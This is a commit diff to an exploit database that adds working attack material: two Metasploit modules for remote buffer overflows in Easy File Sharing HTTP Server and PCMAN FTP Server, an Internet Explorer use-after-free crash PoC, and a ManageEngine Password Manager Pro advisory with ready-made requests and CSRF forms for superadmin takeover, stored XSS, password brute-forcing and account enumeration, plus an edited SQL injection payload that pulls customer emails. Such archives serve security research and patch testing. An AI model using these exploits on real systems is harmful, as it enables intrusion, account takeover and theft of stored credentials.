DB: 2016-04-06
5 new exploits Easy File Sharing HTTP Server 7.2 SEH Overflow PCMAN FTP Server Buffer Overflow - PUT Command Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023) ManageEngine Password Manager Pro 8102 to 8302 - Multiple Vulnerabilities Windows Kernel Win32k.sys Privilege Escalation Exploit (MS14-058)
This commit is contained in:
parent
13d072b592
commit
60fd0ef490
7 changed files with 599 additions and 3 deletions
|
@ -15218,6 +15218,8 @@ id,file,description,date,author,platform,type,port
|
|||
17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow",2011-07-07,metasploit,windows,local,0
|
||||
17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk <= 8.0.0.12 Database Disclosure Exploit",2011-07-07,@ygoltsev,jsp,webapps,0
|
||||
17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal Vulnerability",2011-07-08,"SecPod Research",hardware,remote,0
|
||||
39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 SEH Overflow",2016-04-05,metasploit,windows,remote,80
|
||||
39662,platforms/windows/remote/39662.rb,"PCMAN FTP Server Buffer Overflow - PUT Command",2016-04-05,metasploit,windows,remote,21
|
||||
17508,platforms/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - XSS Vulnerabilities",2011-07-08,"SecPod Research",php,webapps,0
|
||||
17510,platforms/php/webapps/17510.py,"phpMyAdmin3 (pma3) - Remote Code Execution Exploit",2011-07-08,wofeiwo,php,webapps,0
|
||||
17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - (.ZIP) Buffer Overflow Exploit",2011-07-08,"C4SS!0 G0M3S",windows,local,0
|
||||
|
@ -35883,3 +35885,6 @@ id,file,description,date,author,platform,type,port
|
|||
39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0
|
||||
39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0
|
||||
39659,platforms/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2 and 6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps,0
|
||||
39663,platforms/windows/dos/39663.html,"Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",windows,dos,0
|
||||
39664,platforms/jsp/webapps/39664.txt,"ManageEngine Password Manager Pro 8102 to 8302 - Multiple Vulnerabilities",2016-04-05,S3ba,jsp,webapps,7272
|
||||
39666,platforms/windows/local/39666.txt,"Windows Kernel Win32k.sys Privilege Escalation Exploit (MS14-058)",2016-04-05,"MWR InfoSecurity",windows,local,0
|
||||
|
|
Can't render this file because it is too large.
|
388
platforms/jsp/webapps/39664.txt
Executable file
388
platforms/jsp/webapps/39664.txt
Executable file
|
@ -0,0 +1,388 @@
|
|||
[Systems Affected]
|
||||
Product : ManageEngine Password Manager Pro
|
||||
Company : ZOHO Corp.
|
||||
Build Number : 8.1 to 8.3 and probably earlier versions
|
||||
Affected Versions : 8102 to 8302 and probably earlier versions
|
||||
|
||||
|
||||
[Product Description]
|
||||
Password Manager Pro is a secure vault for storing and managing
|
||||
shared sensitive information such as passwords, documents and digital
|
||||
identities of enterprises.
|
||||
|
||||
|
||||
[Vulnerabilities]
|
||||
Multiple vulnerabilities were identified within this application:
|
||||
1- Stored XSS in /AddMail.ve
|
||||
2- Privilege escalation in /EditUser.do
|
||||
3- Business Login Bypass in /EditUser.do
|
||||
4- Password policy bypass in /jsp/xmlhttp/AjaxResponse.jsp
|
||||
5- Horizontal privilege escalation in /jsp/xmlhttp/AjaxResponse.jsp
|
||||
6- Resource's user enumeration in /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp
|
||||
7- Password Bruteforce for resources accounts in
|
||||
/jsp/xmlhttp/AjaxResponse.jsp
|
||||
8- Cross-Site Request Forgery
|
||||
|
||||
|
||||
[Advisory Timeline]
|
||||
17/07/2015 - Discovery and vendor notification
|
||||
17/07/2015 - ManageEngine responsed that they will notify their
|
||||
development team
|
||||
13/10/2015 - ManageEngine informed that they have fixed these issue
|
||||
14/10/2015 - Fixed Password Manager Pro build version 8300 has been released
|
||||
15/10/2015 - Test on Beta build version 8300 was performed and
|
||||
confirm the fix of these issues 2, 4, 7 and part of issue 8
|
||||
02/11/2015 - ManageEngine ask more time to fix the remaining issues
|
||||
before making this public
|
||||
29/12/2015 - ManageEngine contacted for an update - No reply
|
||||
12/01/2016 - ManageEngine contacted for an update - No reply
|
||||
08/02/2016 - ManageEngine contacted for an update - small update provided
|
||||
12/02/2016 - Last communication from ManageEngine
|
||||
04/04/2016 - Public Disclosure
|
||||
|
||||
|
||||
[Patch Available]
|
||||
Password Manager Pro Release 8.3 (8300) (Released on October, 2015)
|
||||
fix issues #2, #4, #7 and partially #8
|
||||
Password Manager Pro Release 8.3 (8303) (Released on December 2015)
|
||||
fix issues #1, #3, #5 and #6
|
||||
|
||||
|
||||
[Exploit]
|
||||
There is an exploit available that takes advantage of the Privilege
|
||||
Escalation vulnerability (Issue #2) and elevates a regular user to
|
||||
SuperAdmin, and then downloads the passwords and files stored within
|
||||
the application. The exploit code is available here
|
||||
- https://github.com/s3bap3/pmp-exploit
|
||||
|
||||
|
||||
[Description of Vulnerabilities]
|
||||
|
||||
(1) Stored XSS in /AddMail.ve.
|
||||
This functionality is under the personal accounts stored in the
|
||||
application. However, as the page is also vulnerable to CSRF, an html
|
||||
form can be forged to create a personal account an exploit the XSS
|
||||
vulnerability. The affected parameter is "password", and the POST
|
||||
message to send is something like this
|
||||
|
||||
[PoC]
|
||||
POST /AddMail.ve?SUBREQUEST=XMLHTTP HTTP/1.1
|
||||
|
||||
service=1&serviceurl=1&loginname=1&password=<!--+--+--><script>alert%28'XSS'%29;<%2fscript><!--+--+-->&spassword=&tags=1&Rule=Low&FORWARDURL=MailAccount.cc%3F
|
||||
|
||||
|
||||
(2) Privilege escalation in /EditUser.do that allows to do 2 things.
|
||||
a- Hijack user's sessions by changing their emails and accessing
|
||||
the forgot password functionality.
|
||||
The affected parameter is "EMAIL" from the /EditUser.do web page.
|
||||
Any user (even PASSWORD USER's role) could send a craft POST method
|
||||
like the one below in order to change the user email address, which is
|
||||
being used to generate a new user password when the previous one was
|
||||
forgotten. The only attribute that needs to be changed from one
|
||||
request to another is the LOGINID, which is a sequence number that
|
||||
represent the User numeric ID.
|
||||
|
||||
b- Escalate privileges by changing the user account status from
|
||||
Password user to superadmin.
|
||||
By forging a similar request it is possible to raise our own
|
||||
privileged to become a privileged user. For example, the parameter
|
||||
"ROLE" can be changed to "Password Auditor" "Password Administrator"
|
||||
or even "Administrator " and become it. It is also possible to become
|
||||
a superAdmin by changing the parameter "superAdmin" from false to
|
||||
true. This will allow us to take control of the application and all
|
||||
the passwords stored on it. In order to become superAdmin, the user
|
||||
role needs to be Administrator. Both can be achieved by forging the
|
||||
same request. In this scenario there are two parameters to be aware
|
||||
of.
|
||||
- USERID and LOGINID is the numeric account id to which the
|
||||
superadmin attribute will be granted (could be obtained from the login
|
||||
reply)
|
||||
- USER is the username to which the superadmin attribute will be granted
|
||||
|
||||
[PoC]
|
||||
POST /EditUser.do?SUBREQUEST=true HTTP/1.1
|
||||
Content-Type: multipart/form-data;
|
||||
boundary=---------------------------20780287114832
|
||||
|
||||
-----------------------------20780287114832
|
||||
Content-Disposition: form-data; name="isloginusersa"
|
||||
|
||||
false
|
||||
-----------------------------20780287114832
|
||||
Content-Disposition: form-data; name="superadminscope"
|
||||
|
||||
true
|
||||
-----------------------------20780287114832
|
||||
Content-Disposition: form-data; name="SERVERPORT"
|
||||
|
||||
7272
|
||||
-----------------------------20780287114832
|
||||
Content-Disposition: form-data; name="OLDROLE"
|
||||
|
||||
Administrator
|
||||
-----------------------------20780287114832
|
||||
Content-Disposition: form-data; name="USERID"
|
||||
|
||||
4
|
||||
-----------------------------20780287114832
|
||||
Content-Disposition: form-data; name="LOGINID"
|
||||
|
||||
4
|
||||
-----------------------------20780287114832
|
||||
Content-Disposition: form-data; name="USER"
|
||||
|
||||
username
|
||||
-----------------------------20780287114832
|
||||
Content-Disposition: form-data; name="OLDLANG"
|
||||
|
||||
en
|
||||
-----------------------------20780287114832
|
||||
Content-Disposition: form-data; name="EMAIL"
|
||||
|
||||
pwned@user.com
|
||||
-----------------------------20780287114832
|
||||
Content-Disposition: form-data; name="ROLE"
|
||||
|
||||
Administrator
|
||||
-----------------------------20780287114832
|
||||
Content-Disposition: form-data; name="superAdmin"
|
||||
|
||||
true
|
||||
-----------------------------20780287114832
|
||||
Content-Disposition: form-data; name="Rule"
|
||||
|
||||
Strong
|
||||
-----------------------------20780287114832
|
||||
Content-Disposition: form-data; name="DEPT"
|
||||
|
||||
|
||||
-----------------------------20780287114832
|
||||
Content-Disposition: form-data; name="LOCATION"
|
||||
|
||||
|
||||
-----------------------------20780287114832
|
||||
Content-Disposition: form-data; name="mobileaccess"
|
||||
|
||||
enable
|
||||
-----------------------------20780287114832
|
||||
Content-Disposition: form-data; name="UserCert"; filename=""
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
|
||||
-----------------------------20780287114832
|
||||
Content-Disposition: form-data; name="lang_code"
|
||||
|
||||
en
|
||||
-----------------------------20780287114832--
|
||||
|
||||
|
||||
(3) Business Login Bypass in /EditUser.do
|
||||
The application allows only the creation of certain amount of
|
||||
Administrator, based on the licences. However it is possible to create
|
||||
more administrators. In order to exploit this go to the user
|
||||
administration page, and edit a user id. Save the edition without
|
||||
making any modification and intercept that POST message. Modify both
|
||||
parameters, "OLDROLE" and "ROLE" with the role "Administrator", and
|
||||
the user role will be changed to this one. Every user can be converted
|
||||
to an administrator even if the license does not allow that much. The
|
||||
application only check the amount of administrators when "ROLE" is
|
||||
Administrator but "OLDROLE" is another one.
|
||||
|
||||
|
||||
(4) Password policy bypass in /jsp/xmlhttp/AjaxResponse.jsp
|
||||
Every time a password for a user account or resource's user account
|
||||
is being changed, a request is sent to this path in order to validate
|
||||
the password against the password policy. Despite the fact the the
|
||||
password is being sent in the URL (this means it could be logged in
|
||||
any proxy or even in the browser), the policy against the password is
|
||||
being evaluated could by changed by modifying the parameter "Rule"
|
||||
from the value it currently has to "Low", in order to be evaluated
|
||||
with a lower policy. For example:
|
||||
|
||||
[PoC]
|
||||
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=b&Rule=Low&AccName=a&ACCID=5
|
||||
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=b&Rule=Low&AccName=a&AccName=5
|
||||
|
||||
|
||||
(5) Horizontal privilege escalation in /jsp/xmlhttp/AjaxResponse.jsp
|
||||
When an administrator creates a Password Reset Listener, another
|
||||
administrator needs to approve it. The same happens when a Listener
|
||||
needs to be suspended. However this could be bypassed by creating and
|
||||
approving the listener by the same administrator. This could be
|
||||
achieved by forging a GET request like the following. The only
|
||||
parameter that needs to be changed is the "LISTENERID" which is a
|
||||
sequence number that represents the Listener.
|
||||
|
||||
[PoC]
|
||||
Listener Approval
|
||||
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=toggleListenerStatus&LISTENERID=4&ISAPPROVED=false&LISTENERTYPE=1&SUBREQUEST=XMLHTTP
|
||||
|
||||
Listener Suspension
|
||||
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=toggleListenerStatus&LISTENERID=4&ISAPPROVED=true&LISTENERTYPE=1&SUBREQUEST=XMLHTTP
|
||||
|
||||
|
||||
(6) Resource's users enumeration in /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp.
|
||||
It is possible to enumerate resource's user accounts by forging a
|
||||
GET request as follows. This URL allows, if a user has access, to
|
||||
retrieve the account password. However if a user does not have access,
|
||||
the error message changes if the user exists or not. The only
|
||||
parameters that needs to be modified are "Resource" and "Account".
|
||||
|
||||
[PoC]
|
||||
https://192.168.56.101:7272/jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp?RequestType=PasswordRetrived&resource=admin+resource&account=admin
|
||||
|
||||
The error messages identifies if the account exists for that resource.
|
||||
Account exists: ____ACCESS___DENIED__
|
||||
Resource/Account does not exists: FAILURE
|
||||
|
||||
|
||||
(7) Password Bruteforce for resources accounts in /jsp/xmlhttp/AjaxResponse.jsp
|
||||
It is possible to enumerate resource's user passwords by forging a
|
||||
GET request as follows. This URL is used in order to validate a user
|
||||
password against the password policy specified. By being able to
|
||||
change the password policy it is possible to use the "Low" policy
|
||||
which does not allow to reuse the password that is currently setup for
|
||||
the user. If an error message that the password could not be reused
|
||||
appears, that indicate that the password is the current password for
|
||||
that account.
|
||||
The only parameters that needs to be modified are "Password" and
|
||||
"ACCID", and ensure that the password policy "Rule" parameter is set
|
||||
to low.
|
||||
|
||||
[PoC]
|
||||
https://192.168.56.101:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=2&Rule=Low&ACCID=8
|
||||
|
||||
The error messages identifies if the password is correct or not
|
||||
for every user account.
|
||||
Password matches: "Password cannot be same as last 1 passwords"
|
||||
Password does not match: "SUCCESS"
|
||||
Account ID does not exists: "Error in validating password policy"
|
||||
|
||||
|
||||
(8) Cross-Site Request Forgery
|
||||
The application is vulnerable to Cross-Site Request Forgery, which
|
||||
by sending specific POST messages it is possible create a user in the
|
||||
system (1), elevate privileges for a user (2)(4), and store a XSS in
|
||||
the user's personal passwords (3). Below are two PoC
|
||||
|
||||
[PoC]
|
||||
User Creation
|
||||
<html>
|
||||
<body>
|
||||
<form method="post"
|
||||
action="https://192.168.0.3:7272/AddUser.do"
|
||||
enctype="multipart/form-data">
|
||||
<input value="true" name="superadminscope"
|
||||
type="hidden"><input value="true" type="hidden">
|
||||
<input value="true" name="isloginusersa"
|
||||
type="hidden"><input value="true" type="hidden">
|
||||
<input value="hacker" name="fname" type="hidden"><input
|
||||
value="true" type="hidden">
|
||||
<input value="hacker" name="lname" type="hidden"><input
|
||||
value="true" type="hidden">
|
||||
<input value="hacker" name="user" type="hidden"><input
|
||||
value="true" type="hidden">
|
||||
<input value="same" name="rbutton" type="hidden"><input
|
||||
value="true" type="hidden">
|
||||
<input value="Strong" name="Rule" type="hidden"><input
|
||||
value="true" type="hidden">
|
||||
<input value="" name="spassword" type="hidden"><input
|
||||
value="true" type="hidden">
|
||||
<input value="hacker@hacker.com" name="mail"
|
||||
type="hidden"><input value="true" type="hidden">
|
||||
<input value="Password User" name="ROLE"
|
||||
type="hidden"><input value="true" type="hidden">
|
||||
<input value="false" name="superAdmin"
|
||||
type="hidden"><input value="true" type="hidden">
|
||||
<input value="" name="dept" type="hidden"><input
|
||||
value="true" type="hidden">
|
||||
<input value="false" name="location"
|
||||
type="hidden"><input value="true" type="hidden">
|
||||
<input value="enable" name="mobileaccess"
|
||||
type="hidden"><input value="true" type="hidden">
|
||||
<input value="en" name="lang_code" type="hidden"><input
|
||||
value="true" type="hidden">
|
||||
<input type="submit" value="Submit">
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
Privilege Escalation
|
||||
<html>
|
||||
<body>
|
||||
<form method="post"
|
||||
action="https://192.168.0.3:7272/EditUser.do?SUBREQUEST=true"
|
||||
enctype="multipart/form-data">
|
||||
<input value="true" name="isloginusersa"
|
||||
type="hidden"><input value="true" type="hidden">
|
||||
<input value="true" name="superadminscope"
|
||||
type="hidden"><input value="true" type="hidden">
|
||||
<input value="Administrator" name="OLDROLE"
|
||||
type="hidden"><input value="true" type="hidden">
|
||||
<input value="613" name="USERID" type="hidden"><input
|
||||
value="true" type="hidden">
|
||||
<input value="613" name="LOGINID" type="hidden"><input
|
||||
value="true" type="hidden">
|
||||
<input value="hacker" name="USER" type="hidden"><input
|
||||
value="true" type="hidden">
|
||||
<input value="en" name="OLDLANG" type="hidden"><input
|
||||
value="true" type="hidden">
|
||||
<input value="hacker@hacker.com" name="EMAIL"
|
||||
type="hidden"><input value="true" type="hidden">
|
||||
<input value="Administrator" name="ROLE"
|
||||
type="hidden"><input value="true" type="hidden">
|
||||
<input value="true" name="superAdmin"
|
||||
type="hidden"><input value="true" type="hidden">
|
||||
<input value="Strong" name="Rule" type="hidden"><input
|
||||
value="true" type="hidden">
|
||||
<input value="" name="DEPT" type="hidden"><input
|
||||
value="true" type="hidden">
|
||||
<input value="" name="LOCATION" type="hidden"><input
|
||||
value="true" type="hidden">
|
||||
<input value="enable" name="mobileaccess"
|
||||
type="hidden"><input value="true" type="hidden">
|
||||
<input value="en" name="lang_code" type="hidden"><input
|
||||
value="true" type="hidden">
|
||||
<input type="submit" value="Submit">
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
Stored XSS
|
||||
<html>
|
||||
<body>
|
||||
<form name="badform" method="post"
|
||||
action="https://192.168.0.3:7272/AddMail.ve?SUBREQUEST=XMLHTTP"
|
||||
accept-charset="UTF-8">
|
||||
<input type="hidden" name="service" value="1" />
|
||||
<input type="hidden" name="serviceurl" value="1" />
|
||||
<input type="hidden" name="loginname" value="1" />
|
||||
<input type="hidden" name="password" value="<!-- --
|
||||
--><script>alert('XSS');</script><!-- -- -->" />
|
||||
<input type="hidden" name="spassword" value="" />
|
||||
<input type="hidden" name="tags" value="" />
|
||||
<input type="hidden" name="Rule" value="Low" />
|
||||
<input type="submit" value="Submit">
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
Privilege Escalation
|
||||
<html>
|
||||
<body>
|
||||
<form name="badform" method="post"
|
||||
action="https://192.168.0.3:7272/ChangeRoles.ve?SUBREQUEST=XMLHTTP"
|
||||
accept-charset="UTF-8">
|
||||
<input type="hidden" name="SKIP_PREF" value="true" />
|
||||
<input type="hidden" name="Admin" value="hacker" />
|
||||
<input type="hidden" name="FORWARDURL"
|
||||
value="UserTabView.cc%3F" />
|
||||
<input type="submit" value="Submit">
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
--
|
||||
S3ba
|
||||
@s3bap3
|
||||
http://linkedin.com/in/s3bap3
|
|
@ -13,15 +13,15 @@
|
|||
------------------------------------------------------------------------
|
||||
vulnerable url:
|
||||
|
||||
/templates1/view_product.php?product=3D
|
||||
/templates1/view_product.php?product=
|
||||
|
||||
Example:
|
||||
|
||||
http://localhost/templates1/view_product.php?product=3D[SQL INJECTION]
|
||||
http://localhost/templates1/view_product.php?product=[SQL INJECTION]
|
||||
|
||||
Get an Mail from the Customers Table:
|
||||
|
||||
http://localhost/templates1/view_product.php?product=3D94746%20AND%20%28SEL=
|
||||
http://localhost/templates1/view_product.php?product=94746%20AND%20%28SEL=
|
||||
ECT%20716%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C122%2C99%=
|
||||
2C109%2C58%29%2C%28SELECT%20MID%28%28IFNULL%28CAST%28email%20AS%20CHAR%29%2=
|
||||
CCHAR%2832%29%29%29%2C1%2C50%29%20FROM%20%60web34-hbecommerc%60.customers%2=
|
||||
|
|
42
platforms/windows/dos/39663.html
Executable file
42
platforms/windows/dos/39663.html
Executable file
|
@ -0,0 +1,42 @@
|
|||
<!--
|
||||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=691
|
||||
|
||||
Minimized PoC:
|
||||
-->
|
||||
|
||||
<svg xmlns="http://www.w3.org/2000/svg" xlink="http://www.w3.org/1999/xlink">
|
||||
<pattern id="outer"><rect id="rect"><pattern id="inner"></pattern></rect></pattern>
|
||||
<script><![CDATA[
|
||||
function handler() {
|
||||
inner.setAttribute("viewBox");
|
||||
}
|
||||
outer.addEventListener("DOMAttrModified", function () { handler(); });
|
||||
doc = document.implementation.createDocument("", "", null);
|
||||
doc.adoptNode(rect.attributes[0]);
|
||||
]]></script>
|
||||
</svg>
|
||||
|
||||
<!--
|
||||
Backtrace for reference:
|
||||
|
||||
2:052:x86> k 10
|
||||
ChildEBP RetAddr
|
||||
WARNING: Stack unwind information not available. Following frames may be wrong.
|
||||
0bb14b64 6ad180b8 vrfcore!VerifierStopMessageEx+0x571
|
||||
0bb14b88 67fec434 vrfcore!VerifierDisableVerifier+0x748
|
||||
0bb14bdc 67fea3dc verifier_67fe0000!VerifierStopMessage+0x74
|
||||
0bb14c40 67fe733d verifier_67fe0000!AVrfpDphReportCorruptedBlock+0x10c
|
||||
0bb14ca4 67fe7495 verifier_67fe0000!AVrfpDphFindBusyMemoryNoCheck+0x7d
|
||||
0bb14cc8 67feb651 verifier_67fe0000!AVrfpDphFindBusyMemory+0x15
|
||||
0bb14ce0 67ff0b12 verifier_67fe0000!AvrfpDphCheckPageHeapAllocation+0x41
|
||||
0bb14cf0 67f93246 verifier_67fe0000!VerifierCheckPageHeapAllocation+0x12
|
||||
0bb14d4c 60dca53f vfbasics+0x13246
|
||||
0bb14d68 604cce4e MSHTML!MemoryProtection::HeapFree+0x46
|
||||
0bb14d70 60b07866 MSHTML!ProcessHeapFree+0x10
|
||||
0bb14d88 60baac6b MSHTML!CSVGHelpers::SetAttributeStringAndPointer<CRectF,CSVGRe
|
||||
ct>+0xb6
|
||||
0bb14de8 60e18b69 MSHTML!PROPERTYDESC::HandleStringProperty+0x110
|
||||
0bb14e14 607e30e6 MSHTML!PROPERTYDESC::CallHandler+0x855996
|
||||
0bb14e54 60b83323 MSHTML!CElement::SetAttributeFromPropDesc+0xbe
|
||||
0bb14ee4 607e2f44 MSHTML!CElement::ie9_setAttributeNSInternal+0x2ee
|
||||
-->
|
After Width: | Height: | Size: 1.7 KiB |
11
platforms/windows/local/39666.txt
Executable file
11
platforms/windows/local/39666.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
Sources:
|
||||
https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113.pdf
|
||||
https://github.com/sam-b/CVE-2014-4113
|
||||
|
||||
EDB Mirror: https://www.exploit-db.com/docs/39665.pdf
|
||||
|
||||
|
||||
Trigger and exploit code for CVE-2014-4113:
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39666.zip
|
||||
|
70
platforms/windows/remote/39661.rb
Executable file
70
platforms/windows/remote/39661.rb
Executable file
|
@ -0,0 +1,70 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Easy File Sharing HTTP Server 7.2 SEH Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software.
|
||||
},
|
||||
'Author' => 'Starwarsfan2099 <starwarsfan2099[at]gmail.com>',
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'EDB', '39008' ],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 390,
|
||||
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x10019798 } ],
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'RPORT' => 80
|
||||
},
|
||||
'DisclosureDate' => 'Dec 2 2015',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def print_status(msg='')
|
||||
super("#{peer} - #{msg}")
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
print_status("Sending exploit...")
|
||||
sploit = "GET "
|
||||
sploit << rand_text_alpha_upper(4061)
|
||||
sploit << generate_seh_record(target.ret)
|
||||
sploit << make_nops(19)
|
||||
sploit << payload.encoded
|
||||
sploit << make_nops(7)
|
||||
sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20)
|
||||
sploit << " HTTP/1.0\r\n\r\n"
|
||||
sock.put(sploit)
|
||||
print_good("Exploit Sent")
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
end
|
80
platforms/windows/remote/39662.rb
Executable file
80
platforms/windows/remote/39662.rb
Executable file
|
@ -0,0 +1,80 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::Ftp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'PCMAN FTP Server Buffer Overflow - PUT Command',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow vulnerability found in the PUT command of the
|
||||
PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
|
||||
credientials are enabled.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Jay Turla', # Initial Discovery -- @shipcod3
|
||||
'Chris Higgins' # msf Module -- @ch1gg1ns
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'EDB', '37731'],
|
||||
[ 'OSVDB', '94624']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process'
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00\x0A\x0D",
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP3 English',
|
||||
{
|
||||
'Ret' => 0x77c35459, # push esp ret C:\WINDOWS\system32\msvcrt.dll
|
||||
'Offset' => 2007
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Aug 07 2015',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def check
|
||||
connect_login
|
||||
disconnect
|
||||
|
||||
if /220 PCMan's FTP Server 2\.0/ === banner
|
||||
Exploit::CheckCode::Appears
|
||||
else
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
connect_login
|
||||
|
||||
print_status('Generating payload...')
|
||||
sploit = rand_text_alpha(target['Offset'])
|
||||
sploit << [target.ret].pack('V')
|
||||
sploit << make_nops(16)
|
||||
sploit << payload.encoded
|
||||
|
||||
send_cmd( ["PUT", sploit], false )
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
Loading…
Add table
Reference in a new issue